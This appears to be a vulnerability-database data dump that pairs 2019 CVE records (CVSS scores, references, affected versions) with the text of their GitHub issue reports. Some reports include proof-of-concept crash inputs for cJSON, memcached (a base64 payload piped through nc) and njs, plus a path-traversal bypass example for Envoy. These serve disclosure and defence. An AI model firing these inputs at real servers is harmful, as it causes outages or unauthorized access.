CVE-2019-9901 | 2019-04-25T16:29:01.200 | Envoy 1.9.0 and before does not normalize HTTP URL paths. A remote attacker may craft a relative path, e.g., something/../admin, to bypass access control, e.g., a block on /admin. A backend server could then interpret the non-normalized path and provide an attacker access beyond the scope provided for by the access con... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Mitigation",
"Third Party Advisory"
],
"url": "https://github.com/envoyproxy/envoy/issues/6435"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/envoyproxy/envoy/security/advisories/GH... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BF47B6A7-F357-4074-B90D-8BEB0AB53DC0",
"versionEndExcluding": null,
"versionEndIncluding": "1.9.0",
"versionStartExclud... | [
"706"
] | 706 | https://github.com/envoyproxy/envoy/issues/6435 | [
"Issue Tracking",
"Mitigation",
"Third Party Advisory"
] | github.com | [
"envoyproxy",
"envoy"
] | See https://github.com/envoyproxy/envoy/security/advisories/GHSA-xcx5-93pw-jw2w | CVE-2019-9901 | https://api.github.com/repos/envoyproxy/envoy/issues/6435/comments | 2 | 2019-03-29T17:03:07Z | 2019-11-08T20:38:37Z | https://github.com/envoyproxy/envoy/issues/6435 | 427,086,726 | 6,435 | 356 |
CVE-2015-9285 | 2019-04-29T14:29:00.257 | esoTalk 1.0.0g4 has XSS via the PATH_INFO to the conversations/ URI. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/esotalk/esoTalk/issues/444"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:esotalk:esotalk:1.0.0:g4:*:*:*:*:*:*",
"matchCriteriaId": "71C911B3-06FF-4672-B402-4B6F16CF2A45",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclu... | [
"79"
] | 79 | https://github.com/esotalk/esoTalk/issues/444 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"esotalk",
"esoTalk"
] | Hello,
Cross-site scripting vulnerability has been announced in [full disclosure mailing list](http://seclists.org/fulldisclosure/2015/Dec/112).
According to this Curesec advisory timeline they were unable to contact you:
```
11/17/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of Disclosure ... | Cross-site scripting vulnerability | https://api.github.com/repos/esotalk/esoTalk/issues/444/comments | 14 | 2015-12-30T06:59:49Z | 2019-04-29T15:14:39Z | https://github.com/esotalk/esoTalk/issues/444 | 124,312,131 | 444 | 357 |
CVE-2016-10749 | 2019-04-29T14:29:00.363 | parse_string in cJSON.c in cJSON before 2016-10-02 has a buffer over-read, as demonstrated by a string that begins with a " character and ends with a \ character. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/DaveGamble/cJSON/commit/94df772485c92866ca417d92137747b2e3b0a917"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cjson_project:cjson:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A3541972-75F2-49E4-8BE8-938C3C6999FF",
"versionEndExcluding": "0.0.0",
"versionEndIncluding": null,
"versionStartExc... | [
"125"
] | 125 | https://github.com/DaveGamble/cJSON/issues/30 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"DaveGamble",
"cJSON"
] | Hi,
I would like to report a buffer overflow in cJSON, you can test this PoC with a ODD string
```
#include <stdio.h>
#include <stdint.h>
#include <fcntl.h>
#include "cJSON.h"
static const char *my_json = "\"000000000000000000\\";
int main(int argc, const char * argv[]) {
cJSON * root = cJSON_Parse(my_json);
... | cJSON buffer overflow with odd formatted JSON string | https://api.github.com/repos/DaveGamble/cJSON/issues/30/comments | 3 | 2016-10-01T08:19:37Z | 2016-11-07T09:37:58Z | https://github.com/DaveGamble/cJSON/issues/30 | 180,445,377 | 30 | 358 |
CVE-2019-11596 | 2019-04-29T15:29:00.983 | In memcached before 1.5.14, a NULL pointer dereference was found in the "lru mode" and "lru temp_ttl" commands. This causes a denial of service when parsing crafted lru command messages in process_lru_command in memcached.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00060.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/memcached/memcached/commit/d35334f368817a... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:memcached:memcached:*:*:*:*:*:*:*:*",
"matchCriteriaId": "85D5D451-DE60-4DD3-8283-D838785D20AC",
"versionEndExcluding": "1.5.14",
"versionEndIncluding": null,
"versionStartEx... | [
"476"
] | 476 | https://github.com/memcached/memcached/issues/474 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"memcached",
"memcached"
] | Dear memcached team —
I have detected a SIGSEGV during the lru command handling.
#### Version
bb0980fbbafd4eb723f76918e7ca364360315c1b
#### How to reproduce
Start memcached
`$ memcached`
Send malicious payload via nc:
`$ echo -n "bHJ1IG1vZGUKb7G0AGxydWRl6gdtTk9UXw==" | base64 -d | nc 127.0.0.1 11211`
#... | segfault (null pointer dereference) during lru command handling | https://api.github.com/repos/memcached/memcached/issues/474/comments | 3 | 2019-04-10T10:38:46Z | 2019-05-05T11:39:44Z | https://github.com/memcached/memcached/issues/474 | 431,429,993 | 474 | 359 |
CVE-2019-11597 | 2019-04-29T16:29:00.407 | In ImageMagick 7.0.8-43 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00001.html"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00043.html"
},
{
"source": "cve@mit... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-43:q16:*:*:*:*:*:*",
"matchCriteriaId": "2EDF50C4-9FFE-4EBF-A5BE-44AF7E6988D9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versi... | [
"125"
] | 125 | https://github.com/ImageMagick/ImageMagick/issues/1555 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [X] I have written a descriptive issue title
- [X] I have verified that I am using the latest version of ImageMagick
- [X] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to... | heap_buffer_overflow in WriteTIFFImage of coders/tiff.c | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1555/comments | 2 | 2019-04-27T13:08:13Z | 2019-05-04T14:21:50Z | https://github.com/ImageMagick/ImageMagick/issues/1555 | 437,941,914 | 1,555 | 360 |
CVE-2019-11598 | 2019-04-29T16:29:00.470 | In ImageMagick 7.0.8-40 Q16, there is a heap-based buffer over-read in the function WritePNMImage of coders/pnm.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file. This is related to SetGrayscaleImage in MagickCore/quantize.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00057.html"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00001.html"
},
{
"source": "cve@mit... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-40:q16:*:*:*:*:*:*",
"matchCriteriaId": "389645FC-93EE-430B-AFAB-108570F3857D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versi... | [
"125"
] | 125 | https://github.com/ImageMagick/ImageMagick/issues/1540 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [X] I have written a descriptive issue title
- [X] I have verified that I am using the latest version of ImageMagick
- [X] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to... | heap-buffer-overflow in WritePNMImage of coders/pnm.c | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1540/comments | 6 | 2019-04-08T03:10:13Z | 2019-05-12T11:30:48Z | https://github.com/ImageMagick/ImageMagick/issues/1540 | 430,236,223 | 1,540 | 361 |
CVE-2019-11632 | 2019-05-01T14:29:00.483 | In Octopus Deploy 2019.1.0 through 2019.3.1 and 2019.4.0 through 2019.4.5, an authenticated user with the VariableViewUnscoped or VariableEditUnscoped permission scoped to a specific project could view or edit unscoped variables from a different project. (These permissions are only used in custom User Roles and do not ... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"confidentialityImpact": "PARTIAL"... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/OctopusDeploy/Issues/issues/5528"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/OctopusDeploy/Issues/issues/55... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:octopus:octopus_deploy:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EEF5B5BF-E265-46DC-A509-3DC3B426D817",
"versionEndExcluding": null,
"versionEndIncluding": "2019.3.1",
"versionSt... | [
"269"
] | 269 | https://github.com/OctopusDeploy/Issues/issues/5528 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"OctopusDeploy",
"Issues"
] | # Prerequisites
- [x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process](https://octopushq.atlassian.net/wiki/spaces/IN/pages/2430143/Security+Disclosure+Policy).
- [x] I have raised a CVE according to our [CVE process] (https://octopushq.atlassian.net/... | Variable[View/Edit]Unscoped permissions don't comply with project scoping (CVE-2019-11632) | https://api.github.com/repos/OctopusDeploy/Issues/issues/5528/comments | 3 | 2019-05-01T05:11:04Z | 2019-07-31T08:42:24Z | https://github.com/OctopusDeploy/Issues/issues/5528 | 439,070,509 | 5,528 | 362 |
CVE-2019-11632 | 2019-05-01T14:29:00.483 | In Octopus Deploy 2019.1.0 through 2019.3.1 and 2019.4.0 through 2019.4.5, an authenticated user with the VariableViewUnscoped or VariableEditUnscoped permission scoped to a specific project could view or edit unscoped variables from a different project. (These permissions are only used in custom User Roles and do not ... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"confidentialityImpact": "PARTIAL"... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/OctopusDeploy/Issues/issues/5528"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/OctopusDeploy/Issues/issues/55... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:octopus:octopus_deploy:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EEF5B5BF-E265-46DC-A509-3DC3B426D817",
"versionEndExcluding": null,
"versionEndIncluding": "2019.3.1",
"versionSt... | [
"269"
] | 269 | https://github.com/OctopusDeploy/Issues/issues/5529 | [
"Third Party Advisory"
] | github.com | [
"OctopusDeploy",
"Issues"
] | This bug represents [this issue](https://github.com/OctopusDeploy/Issues/issues/5528) in LTS 2019.3 | Variable[View/Edit]Unscoped permissions don't comply with project scoping (CVE-2019-11632) | https://api.github.com/repos/OctopusDeploy/Issues/issues/5529/comments | 3 | 2019-05-01T05:15:06Z | 2019-07-31T08:42:27Z | https://github.com/OctopusDeploy/Issues/issues/5529 | 439,071,058 | 5,529 | 363 |
CVE-2019-11641 | 2019-05-01T18:29:01.550 | Anomali Agave (formerly Drupot) through 1.0.0 fails to avoid fingerprinting by including predictable data and minimal variation in size within HTML templates, giving attackers the ability to detect and avoid this system. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/threatstream/agave/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:anomali:agave:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0ACE5B38-0711-4A94-B943-AF9717CEC465",
"versionEndExcluding": null,
"versionEndIncluding": "1.0.0",
"versionStartExcluding... | [
"330"
] | 330 | https://github.com/threatstream/agave/issues/1 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"threatstream",
"agave"
] | Agave fails to avoid fingerprinting by including predictable data and minimal variation in size within HTML templates. Giving attackers the ability to detect and avoid this system.
CVE-2019-11641
Gionathan Armando Reale | Fingerprinting | https://api.github.com/repos/pwnlandia/agave/issues/1/comments | 1 | 2019-05-01T11:18:28Z | 2019-05-31T23:06:32Z | https://github.com/pwnlandia/agave/issues/1 | 439,134,478 | 1 | 364 |
CVE-2019-10249 | 2019-05-06T16:29:00.240 | All Xtext & Xtend versions prior to 2.18.0 were built using HTTP instead of HTTPS file transfer and thus the built artifacts may have been compromised. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "emo@eclipse.org",
"tags": [
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=546996"
},
{
"source": "emo@eclipse.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "h... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eclipse:xtend:*:*:*:*:*:*:*:*",
"matchCriteriaId": "935976C9-C545-4C52-9822-E107685CD302",
"versionEndExcluding": "2.18.0",
"versionEndIncluding": null,
"versionStartExcludin... | [
"116"
] | 116 | https://github.com/eclipse/xtext-xtend/issues/759 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"eclipse",
"xtext-xtend"
] | [CWE-829: Inclusion of Functionality from Untrusted Control Sphere](https://cwe.mitre.org/data/definitions/829.html)
[CWE-494: Download of Code Without Integrity Check](https://cwe.mitre.org/data/definitions/494.html)
The build files indicate that this project is resolving dependencies over HTTP instead of HTTPS. A... | [CVE-2019-10249][SECURITY] Releases are built/executed/released in the context of insecure/untrusted code | https://api.github.com/repos/eclipse-archived/xtext-xtend/issues/759/comments | 17 | 2019-03-26T15:43:58Z | 2019-05-06T17:25:09Z | https://github.com/eclipse-archived/xtext-xtend/issues/759 | 425,497,425 | 759 | 365 |
CVE-2019-11808 | 2019-05-07T07:29:05.167 | Ratpack versions before 1.6.1 generate a session ID using a cryptographically weak PRNG in the JDK's ThreadLocalRandom. This means that if an attacker can determine a small window for the server start time and obtain a session ID value, they can theoretically determine the sequence of session IDs. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ratpack/ratpack/commit/f2b63eb82dd71194319fd3945f5edf29b8f3a42d"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:ratpack_project:ratpack:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1FB3DD33-AEA0-48E6-9600-2B857CB25D61",
"versionEndExcluding": "1.6.1",
"versionEndIncluding": null,
"versionStar... | [
"338"
] | 338 | https://github.com/ratpack/ratpack/issues/1448 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"ratpack",
"ratpack"
] | Use UUID directly for generating session IDs | https://api.github.com/repos/ratpack/ratpack/issues/1448/comments | 1 | 2019-04-23T01:51:49Z | 2019-04-24T17:40:33Z | https://github.com/ratpack/ratpack/issues/1448 | 435,961,699 | 1,448 | 366 | |
CVE-2019-10742 | 2019-05-07T19:29:00.690 | Axios up to and including 0.18.0 allows attackers to cause a denial of service (application crash) by continuing to accepting content after maxContentLength is exceeded. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://app.snyk.io/vuln/SNYK-JS-AXIOS-174505"
},
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ax... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:axios:axios:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "396BB583-B6CD-444E-9B24-DA0C42F6C42F",
"versionEndExcluding": null,
"versionEndIncluding": "0.18.0",
"versionStartExcl... | [
"755"
] | 755 | https://github.com/axios/axios/issues/1098 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"axios",
"axios"
] | #### Summary
The following code demonstrates the issue:
```javascript
require('axios').get(
'https://upload.wikimedia.org/wikipedia/commons/f/fe/A_Different_Slant_on_Carina.jpg',
{ maxContentLength: 2000 }
)
.then(d => console.log('done'))
.catch(e => console.log(e.toString()))
```
Expected beha... | Download continues after maxContentLength exceeded | https://api.github.com/repos/axios/axios/issues/1098/comments | 7 | 2017-09-22T06:34:42Z | 2020-05-22T13:06:23Z | https://github.com/axios/axios/issues/1098 | 259,716,605 | 1,098 | 367 |
CVE-2019-11818 | 2019-05-08T16:29:00.737 | Alkacon OpenCMS v10.5.4 and before is affected by stored cross site scripting (XSS) in the module New User (/opencms/system/workplace/admin/accounts/user_new.jsp). This allows an attacker to insert arbitrary JavaScript as user input (First Name or Last Name), which will be executed whenever the affected snippet is load... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/alkacon/opencms-core/issues/635"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "https://www... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BFDD07EF-673F-485F-B0C7-AC2F8B8EC945",
"versionEndExcluding": null,
"versionEndIncluding": "10.5.4",
"versionStartExclud... | [
"79"
] | 79 | https://github.com/alkacon/opencms-core/issues/635 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"alkacon",
"opencms-core"
] | Hello Team,
I would like to report a vulnerability (cross-site-scripting) which I have observed in current version v10.5.4 and before.
Cross-Site Scripting (XSS) allows attacker to inject the malicious JavaScript as user input and then malicious script can access any cookies, session tokens, or other sensitive in... | Cross Site Scripting | v10.5.4 | New User | https://api.github.com/repos/alkacon/opencms-core/issues/635/comments | 2 | 2019-04-08T08:22:14Z | 2021-10-07T12:49:01Z | https://github.com/alkacon/opencms-core/issues/635 | 430,317,717 | 635 | 368 |
CVE-2019-11819 | 2019-05-08T16:29:00.830 | Alkacon OpenCMS v10.5.4 and before is affected by CSV (aka Excel Macro) Injection in the module New User (/opencms/system/workplace/admin/accounts/user_new.jsp) via the First Name or Last Name. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/alkacon/opencms-core/issues/636"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "https://www... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BFDD07EF-673F-485F-B0C7-AC2F8B8EC945",
"versionEndExcluding": null,
"versionEndIncluding": "10.5.4",
"versionStartExclud... | [
"1236"
] | 1236 | https://github.com/alkacon/opencms-core/issues/636 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"alkacon",
"opencms-core"
] | Hello Team,
I would like to report a vulnerability (CSV Injection) which I have observed in current version v10.5.4 and before.
When a spreadsheet program such as Microsoft Excel or LibreOffice Calc is used to open a CSV, any cells starting with '=' will be interpreted by the software as a formula. Maliciously cr... | CSV Injection | v10.5.4 | New User | https://api.github.com/repos/alkacon/opencms-core/issues/636/comments | 3 | 2019-04-08T10:36:24Z | 2021-10-07T14:38:03Z | https://github.com/alkacon/opencms-core/issues/636 | 430,376,699 | 636 | 369 |
CVE-2019-11406 | 2019-05-08T18:29:00.343 | Subrion CMS 4.2.1 allows _core/en/contacts/ XSS via the name, email, or phone parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/intelliants/subrion/commits/develop"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/intelliants/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:intelliants:subrion_cms:4.2.1:*:*:*:*:*:*:*",
"matchCriteriaId": "1964CC54-4FD5-44DF-A183-0538C48EA988",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | [
"79"
] | 79 | https://github.com/intelliants/subrion/issues/821 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"intelliants",
"subrion"
] | > # Title: [Subrion CMS- 4.2.1 XSS]
> # Date: [12-04-2019]
> # [Vulnerability Type]
> Cross Site Scripting (XSS)
> # Version: [4.2.1]
> # Tested on:
[Windows,FireFox]
> # [Affected Product Code Base]
> Subrion CMS - 4.2.1
> # [Affected Component]
> parameter: name.
> parameter: email.
> parameter: phone.
... | demos.subrion.org allows _core/en/contacts/ XSS via the name, email, or phone parameter | https://api.github.com/repos/intelliants/subrion/issues/821/comments | 1 | 2019-04-21T17:35:42Z | 2020-02-28T05:05:11Z | https://github.com/intelliants/subrion/issues/821 | 435,530,877 | 821 | 370 |
CVE-2019-11838 | 2019-05-09T14:29:00.557 | njs through 0.3.1, used in NGINX, has a heap-based buffer overflow in Array.prototype.splice after a resize, related to njs_array_prototype_splice in njs/njs_array.c, because of njs_array_expand size mishandling. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/nginx/njs/issues/153"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Ad... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3F70BB50-E3EC-44F8-BC1A-D514EA261742",
"versionEndExcluding": null,
"versionEndIncluding": "0.3.1",
"versionStartExcluding": null... | [
"787"
] | 787 | https://github.com/nginx/njs/issues/153 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"nginx",
"njs"
] | ```js
var v0=[]
var x = new Array(10)
var i = 0
while (i < 100) {
v0.shift(v0.splice(0, "AAAA", "BBBB"))
i++;
}
```
```js
$ njs test.js
==21010==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60d00000c700 at pc 0x000000447d20 bp 0x7fffbdc99110 sp 0x7fffbdc99100
WRITE of size 16 at 0x... | heap-buffer-overflow in Array.prototype.splice() after resize. | https://api.github.com/repos/nginx/njs/issues/153/comments | 0 | 2019-05-07T17:43:35Z | 2019-05-14T17:37:45Z | https://github.com/nginx/njs/issues/153 | 441,355,829 | 153 | 373 |
CVE-2019-11839 | 2019-05-09T14:29:00.637 | njs through 0.3.1, used in NGINX, has a heap-based buffer overflow in Array.prototype.push after a resize, related to njs_array_prototype_push in njs/njs_array.c, because of njs_array_expand size mishandling. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/nginx/njs/issues/152"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Ad... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3F70BB50-E3EC-44F8-BC1A-D514EA261742",
"versionEndExcluding": null,
"versionEndIncluding": "0.3.1",
"versionStartExcluding": null... | [
"787"
] | 787 | https://github.com/nginx/njs/issues/152 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"nginx",
"njs"
] | ```js
var v0=[], i = 0;
while (i++ < 100) {
v0.push(v0.shift(0));
}
```
```sh
$ njs test.js
==13374==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60d00000c7d0 at pc 0x000000447165 bp 0x7ffd25e422b0 sp 0x7ffd25e422a
0
WRITE of size 16 at 0x60d00000c7d0 thread T0
#0 0x447164 in njs... | heap-buffer-overflow in Array.prototype.push() after resize. | https://api.github.com/repos/nginx/njs/issues/152/comments | 0 | 2019-05-07T17:30:56Z | 2019-05-08T22:22:13Z | https://github.com/nginx/njs/issues/152 | 441,350,927 | 152 | 374 |
CVE-2017-12804 | 2019-05-09T16:29:00.247 | The iwgif_init_screen function in imagew-gif.c:510 in ImageWorsener 1.3.2 allows remote attackers to cause a denial of service (hmemory exhaustion) via a crafted file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
